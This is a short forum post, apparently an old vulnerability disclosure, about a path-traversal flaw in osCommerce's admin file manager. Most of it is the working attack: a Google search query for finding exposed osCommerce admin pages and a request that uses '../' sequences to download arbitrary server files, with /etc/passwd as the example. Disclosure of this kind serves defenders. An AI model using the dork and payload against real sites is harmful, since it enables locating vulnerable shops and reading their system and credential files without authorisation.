greets, while i was "warsearching" with google i suddenly have been on the admin interfaces of many oscommerce sites. i made a: allinurl:admin/file_manager.php
for nomal you can only view your oscommerce directorys, but if you type in the following you can view any file on the server with the webservers permissions: file_manager.php?action=download&filename=../../../../../../../../ etc/passwd
as you have to be logged in this isnt hot but i think its better to know about it.
l0om
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
